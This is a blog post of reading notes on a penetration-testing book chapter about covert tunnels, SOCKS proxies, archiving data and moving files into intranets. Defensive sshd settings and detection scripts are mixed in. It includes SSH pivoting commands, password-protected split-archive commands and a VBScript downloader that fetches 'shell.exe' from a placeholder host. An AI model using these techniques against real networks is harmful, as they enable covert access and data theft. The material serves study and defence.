"Intranet Security Attack and Defense: A Practical Guide to Penetration Testing" Reading Notes (3): Hidden Communication Tunnel Technology

Foreword

This article continues the reading notes on "Intranet Security Attack and Defense: A Practical Guide to Penetration Testing". It covers chapter 3, hidden communication tunnel technology, which describes in detail the use of IPv6 tunnels, ICMP tunnels, HTTPS tunnels, SSH tunnels, DNS tunnels and other encrypted tunnels, and explains the common SOCKS proxy tools and the ways files are uploaded to and downloaded from an intranet.

The related knowledge was studied and written up earlier; see: Intranet Penetration Series: Intranet Penetration (Tunnel) Learning

1. Basic knowledge

1. Overview

A hidden network communication tunnel is the main means by which an attacker exchanges information with the target host.

When large volumes of TCP and UDP traffic are intercepted by defensive systems, protocols that are hard to disable, such as DNS and ICMP, are exploited by attackers and become the main channels through which they control their tunnels.

Commonly used tunnels:

  • Network layer: IPv6 tunnel, ICMP tunnel, GRE tunnel
  • Transport layer: TCP tunnel, UDP tunnel, regular port forwarding
  • Application layer: SSH tunnel, HTTP tunnel, HTTPS tunnel, DNS tunnel

2. Determine the connectivity of the intranet

Connectivity is checked per protocol with the following commands:

# ICMP
ping www.baidu.com

# TCP
nc -zv 192.168.1.10 80

# HTTP
curl www.baidu.com:80
# curl through a proxy
curl -x proxy-ip:port www.baidu.com

# DNS
# nslookup on Windows
nslookup www.baidu.com vps-ip
# dig on Linux
dig @vps-ip www.baidu.com

2. Network Layer Tunneling Technology

1. IPv6 tunnel

An IPv6 tunnel can use IPv4 as a tunnel carrier and encapsulate the entire IPv6 packet in an IPv4 data packet.


Several tools:

2. ICMP tunnel

With most communication protocols, two devices that want to talk to each other need an open port; the ICMP protocol has no such requirement.

See also: Intranet penetration series: ICMP tunnel of intranet tunnel

3. Transport Layer Tunneling Technology

Mainly TCP tunnels, UDP tunnels and ordinary port forwarding, most of which are blocked at the border.

Tools can be found in: Intranet Penetration Series: Intranet Penetration (Tunnel) Learning

4. Application Layer Tunneling Technology

1. SSH tunnel

Almost all Linux/UNIX servers and network devices support the SSH protocol. SSH traffic is usually allowed through firewalls and border devices, so it is often abused by attackers.

# Local forwarding
ssh -CfNg -L 1153:1.1.1.10:3389 user@jump-host
#   1153 = listening port on the VPS, 1.1.1.10:3389 = target IP and port,
#   user@jump-host = placeholder login on the jump host

# Remote forwarding
ssh -CfNg -R 3307:1.1.1.10:3389 user@vps-ip
#   3307 = listening port on the VPS, 1.1.1.10:3389 = target IP and port,
#   user@vps-ip = placeholder login on the VPS


-L: local port forwarding; -R: remote port forwarding; -D: dynamic forwarding (SOCKS proxy)

Defense:

  • IP whitelists
  • ACLs that restrict the source IPs allowed to connect
  • Configuring systems to use out-of-band management entirely
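The measures above can be backed by the SSH daemon's own forwarding controls. The sshd_config fragment below is an added example, not from the book: the permissive settings that make every SSH session a potential tunnel are shown beside the restricted ones, and backupadmin is a hypothetical account name.

```text
# Permissive settings: any authenticated user can turn the session into a tunnel
AllowTcpForwarding yes      # enables -L/-R port forwarding and -D SOCKS proxying
GatewayPorts yes            # remote-forwarded ports listen on all interfaces, not just loopback
PermitTunnel yes            # allows layer-2/3 tun(4) forwarding with ssh -w
X11Forwarding yes

# Restricted settings: deny forwarding globally, re-enable it only for named accounts
AllowTcpForwarding no
GatewayPorts no
PermitTunnel no
X11Forwarding no
LogLevel VERBOSE            # sshd logs per-channel detail, useful for reviewing forwarding attempts

Match User backupadmin      # hypothetical account that legitimately needs a local forward
    AllowTcpForwarding local
```

Restart sshd after editing and confirm with `ssh -L` from a test account that the forward is refused.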

2. HTTP/HTTPS tunnel

Well-known tools include reGeorg, meterpreter and tunna.

3. DNS tunnel

DNS is an essential service, and DNS packets have the ability to penetrate firewalls.

From the DNS protocol's point of view, the client merely queries a specific domain name over and over and receives resolution results. The essential problem is that the expected answer should be an IP address, whereas what actually comes back is an arbitrary string, which may include encrypted C2 instructions.

The essence of DNS tunneling is to encapsulate other protocols in the DNS protocol for transmission.

See: Intranet Penetration Series: DNS Tunnel of Intranet Tunnel
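The observation above, that tunnel queries carry arbitrary data where a name and an address should be, is what a detection rule can key on. The following Python is an added example, not from the book: it scores query-log lines on leftmost-label length and entropy and on payload-friendly record types. The log format and the `c2.example.net` sample are constructed for the example.

```python
import math
from collections import Counter

# Constructed sample of DNS query log lines (client, qtype, qname); not from the page.
SAMPLE_LOG = """\
10.0.0.5 A www.baidu.com
10.0.0.5 A cdn.example.com
10.0.0.7 TXT 2f6d7a3c9a1e4b8d0f3a5c7e9b1d3f5a.c2.example.net
10.0.0.7 TXT 7a1b2c3d4e5f60718293a4b5c6d7e8f9.c2.example.net
10.0.0.7 TXT 9e8d7c6b5a4f3e2d1c0b9a8f7e6d5c4b.c2.example.net
10.0.0.9 A mail.example.com
"""

def shannon_entropy(s: str) -> float:
    """Bits of entropy per character; hex/base32-encoded payload labels score high."""
    if not s:
        return 0.0
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in Counter(s).values())

def suspicious_query(qtype, qname, max_label=30, min_entropy=3.5):
    """Return the reasons a single query looks like tunnel traffic (empty list if none).
    A tunnel client smuggles data in the leftmost label, so that label becomes long and
    random-looking, and it prefers record types (TXT, NULL) that carry free-form answers."""
    first = qname.rstrip(".").split(".")[0]
    reasons = []
    if len(first) > max_label:
        reasons.append("long-label")
    if shannon_entropy(first) >= min_entropy:
        reasons.append("high-entropy")
    if qtype in ("TXT", "NULL"):
        reasons.append("payload-type")
    return reasons

def flag_tunnel_candidates(log_text, min_hits=2):
    """Map client -> number of suspicious queries, keeping clients at or above min_hits.
    Counting per client suppresses the occasional legitimate TXT lookup (SPF, DKIM)."""
    hits = Counter()
    for line in log_text.splitlines():
        parts = line.split()
        if len(parts) != 3:
            continue  # skip malformed lines rather than crash on them
        client, qtype, qname = parts
        if suspicious_query(qtype, qname):
            hits[client] += 1
    return {c: n for c, n in hits.items() if n >= min_hits}
```

Thresholds are starting points; tune them against a baseline of the network's own resolver logs before alerting on them.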

5. SOCKS proxy

SOCKS is short for "SOCKetS".

  • SOCKS4 supports only TCP
  • SOCKS5 supports both TCP and UDP, and also supports several authentication mechanisms

The SOCKS proxy is at the lower level and is at the session layer; while the HTTP proxy is at the application layer. Therefore, a SOCKS proxy can proxy all client connections, while an HTTP proxy can only proxy clients that use the HTTP protocol. SOCKS proxies are faster because they are lower-level and don't need to deal with the details of higher-level protocols.

A socket describes an IP address plus a port; it is a handle to a communication link and is used to implement communication between different computers. In essence it is a programming interface (API), an encapsulation of IP. SOCKS, by contrast, is a proxy protocol, whose latest version is SOCKS5. A proxy is something through which you access the network indirectly, like a relay station. The difference: a socket is an API, a tool for establishing network connections; SOCKS is a protocol, a set of data structures.

There are currently four main VPN tunneling protocols: the Point-to-Point Tunneling Protocol (PPTP), the Layer 2 Tunneling Protocol (L2TP), the network layer tunneling protocol IPSec, and SOCKS v5. PPTP and L2TP work at the data link layer, IPSec works at the network layer, and SOCKS v5 works at the session layer.

Examples: EarthWorm (ew; the newer version is Termite), reGeorg, sSocks, SocksCap64 (SSTap), Proxifier, ProxyChains
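The SOCKS4/SOCKS5 differences listed above are visible in the first bytes a client sends, which is how a network monitor can recognise proxy handshakes on non-standard ports. The Python below is an added example, not from the book or any of the tools named: it decodes a SOCKS4 request, a SOCKS5 method greeting and a SOCKS5 connect request; the three byte strings are constructed samples.

```python
# Constructed client-to-proxy bytes (not from the page), as a capture tool would show them.
SAMPLE_SOCKS4 = b"\x04\x01\x0d\x3d\x0a\x01\x02\x03user\x00"        # CONNECT 10.1.2.3:3389
SAMPLE_SOCKS5_GREETING = b"\x05\x02\x00\x02"                        # offers no-auth, user/pass
SAMPLE_SOCKS5_REQUEST = b"\x05\x01\x00\x03\x0bexample.net\x01\xbb"  # CONNECT example.net:443

SOCKS5_METHODS = {0x00: "no-auth", 0x01: "gssapi", 0x02: "username/password", 0xFF: "none-acceptable"}
SOCKS_CMDS = {0x01: "CONNECT", 0x02: "BIND", 0x03: "UDP-ASSOCIATE"}

def classify_socks(payload: bytes):
    """Classify the first client bytes of a TCP stream.
    SOCKS4: VN=4, CD, DSTPORT(2), DSTIP(4), USERID, NUL  (TCP only, no authentication).
    SOCKS5: VER=5, NMETHODS, METHODS[]                   (auth is negotiated first).
    Returns a dict describing the handshake, or None if it is not SOCKS."""
    if len(payload) >= 9 and payload[0] == 0x04 and payload[1] in (0x01, 0x02):
        port = int.from_bytes(payload[2:4], "big")
        ip = ".".join(str(b) for b in payload[4:8])
        return {"version": 4, "cmd": SOCKS_CMDS[payload[1]], "host": ip, "port": port}
    if len(payload) >= 3 and payload[0] == 0x05:
        n = payload[1]
        if len(payload) >= 2 + n:
            methods = [SOCKS5_METHODS.get(m, f"0x{m:02x}") for m in payload[2:2 + n]]
            return {"version": 5, "auth_methods": methods}
    return None

def parse_socks5_request(payload: bytes):
    """Decode the SOCKS5 request sent after method negotiation:
    VER CMD RSV ATYP DST.ADDR DST.PORT, where ATYP selects IPv4, domain name or IPv6."""
    if len(payload) < 4 or payload[0] != 0x05:
        return None
    cmd, atyp = payload[1], payload[3]
    if atyp == 0x01 and len(payload) >= 8:       # IPv4, 4 bytes
        host, end = ".".join(str(b) for b in payload[4:8]), 8
    elif atyp == 0x03 and len(payload) >= 5:     # domain name, length-prefixed
        n = payload[4]
        host, end = payload[5:5 + n].decode("ascii", "replace"), 5 + n
    elif atyp == 0x04 and len(payload) >= 20:    # IPv6, 16 bytes
        host, end = payload[4:20].hex(), 20
    else:
        return None
    if len(payload) < end + 2:
        return None                              # truncated: port missing
    port = int.from_bytes(payload[end:end + 2], "big")
    return {"cmd": SOCKS_CMDS.get(cmd, "unknown"), "host": host, "port": port}
```

A SOCKS5 greeting offering only "no-auth" on an unexpected port, followed by CONNECT requests to internal addresses, is the pattern the proxy tools above produce.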

6. Compressing data

1. rar.exe

Package everything in the E:\webs\ directory into 1.rar and store it in E:\webs\

rar.exe a -k -r -s -m3 E:\webs\1.rar E:\webs\

Extract E:\webs\1.rar into the current directory

rar.exe e E:\webs\1.rar

Compress all files and folders in the E:\API directory into multi-volume archives of 20 MB each

rar.exe a -m0 -r -v20m E:\test.rar E:\API

Extract E:\test.part01.rar (the first volume) into the E:\x1 directory

rar.exe x E:\test.part01.rar E:\x1

2. 7-zip

Package everything in the E:\webs\ directory into 1.7z, protected with the password 12345, and store it in E:\webs\

7z.exe a -r -p12345 E:\webs\1.7z E:\webs\

Extract E:\webs\1.7z into the current directory

7z.exe e -p12345 E:\webs\1.7z

Compress all files and folders in the E:\API directory into multi-volume archives of 20 MB each, protected with the password admin

7z.exe a -r -v20m -padmin E:\test.7z E:\API

Extract E:\test.7z.001 (the first volume) into the E:\x1 directory

7z.exe x -padmin E:\test.7z.001 -oE:\x1

7. Upload and download

1. VBS

Run the following command on the target host to download the shell.exe file:

cscript download.vbs

download.vbs code:

' Fetch http://IP/shell.exe over HTTP with MSXML and write the body to disk with an ADODB stream
Set post = CreateObject("Msxml2.XMLHTTP")
Set shell = CreateObject("Wscript.Shell")
post.Open "GET", "http://IP/shell.exe", 0     ' 0 = synchronous request
post.Send
Set aGet = CreateObject("ADODB.Stream")
aGet.Mode = 3                                  ' adModeReadWrite
aGet.Type = 1                                  ' adTypeBinary
aGet.Open
aGet.Write post.responseBody
aGet.SaveToFile "C:\test\shell.exe", 2         ' adSaveCreateOverWrite

2. Debug upload

First convert the EXE file to be uploaded into hexadecimal (HEX) form, then write the HEX code into a file with the echo command, and finally use the Debug utility to assemble the HEX code back into an EXE file.

In Kali Linux, the exe2bat.exe tool is located in the /usr/share/windows-binaries directory. Run

wine exe2bat.exe ew.exe ew.txt

to convert ew.exe to ew.txt.

Then copy the contents of ew.txt into the command-line environment of the target system with the echo command, and use the target server's Debug utility to restore the HEX code to an EXE file.

3. Other

Files can also be uploaded with:

  • Nishang: use Nishang to convert the EXE file to be uploaded into hexadecimal form, write it to the target server with the echo command, and finally use the Download_Execute script to download the text file and convert it back into an EXE file
  • bitsadmin: recommended on Windows 7 and Windows 8 hosts; note that it supports neither HTTPS nor FTP, nor Windows XP/Server 2003 and earlier versions
  • PowerShell download

Epilogue

This chapter is mainly about hidden communication tunnels. Since this material was studied before, it is not recorded in detail here; see the other related articles on the blog for details.


Source: blog.csdn.net/weixin_44604541/article/details/124060260